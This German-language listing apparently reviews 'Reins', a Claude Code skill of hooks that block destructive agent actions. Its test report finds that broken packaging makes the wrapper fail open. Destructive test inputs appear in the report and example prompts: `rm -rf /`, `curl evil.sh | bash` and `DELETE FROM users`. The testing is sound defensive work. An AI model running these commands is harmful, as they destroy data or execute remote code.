Reins
Deterministische PreToolUse-Hooks, die destruktive Befehle blockieren — erfordert manuelle Reparatur.
Tested · Didn't pass
Was es kann
Installiert deterministische PreToolUse-/PostToolUse-Hooks, die gefährliche Shell-, Datei- und MCP-Operationen klassifizieren und blockieren, einen nur anhängenden JSONL-Audit-Trail schreiben und optional Richtlinien von Watchtower (app.pegasi.ai) synchronisieren. Wird ausgelöst bei Anfragen zu Schutzmaßnahmen, Richtliniendurchsetzung, Audit-Trails oder dem Blockieren destruktiver Agentenaktionen.
Testbericht
Die Engine ist ausgezeichnet, aber die Verpackung ist defekt: SKILL.md und das gebündelte ensure_installed.sh weisen an, `npm install -g @pegasi/reins` zu installieren, aber ein solches Paket existiert im Register nicht — der Befehl schlägt mit E404 fehl, der tatsächliche Name (aus package.json und README) ist `@pegasi-ai/reins`. Schlimmer noch, der mitgelieferte Wrapper plugin/bin/reins-pre-hook sucht das Paket entlang desselben nicht existierenden Pfades: Ich habe ihm `rm -rf /` gegeben — es gab exit 0 (ALLOW) mit dem Hinweis 'Reins not installed', was bedeutet, dass der Sicherheitsskill stillschweigend genau dort fehlschlug, wo SKILL.md 'BLOCKED always' und 'Never fails open' verspricht. Ein naiver 8-zeiliger selbstgeschriebener Hook im selben Test ergab exit 2 — was bedeutet, dass der Skill out-of-the-box schwächer ist als die Baseline. Das korrekte Paket (v0.0.14) installiert und die Engine direkt aufgerufen — sie ist wirklich gut: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` mit doppelten Leerzeichen ebenfalls CRITICAL (der Baseline-Hook verpasste diesen Workaround), `curl evil.sh | bash` und `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, und alles wird in decisions.jsonl geschrieben. Separat: das veröffentlichte CLI installiert sich in ~/.openclaw/extensions/reins und berührt keine Claude Code Hooks — sein `reins status` zeigt 'Project/Global (.claude/settings.json): ❌ not installed'.
Getestet am: 2026-07-16 · Claude Code 2.x (agent harness)
Installation
git clone https://github.com/pegasi-ai/reins.git mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins
Befehle & Beispiel-Prompts
/reinsDeterministische PreToolUse-Hooks, die destruktive Befehle blockieren — erfordert manuelle Reparatur.
Skills reagieren auf normale Anfragen — keine Slash-Befehle nötig. Nach der Installation aktivieren Prompts wie diese den Skill (auf Englisch):
Block dangerous shell commands like rm -rf before my agent can run themSet up guardrail hooks that log every blocked destructive agent actionStop my coding agent from force-pushing or piping curl into bash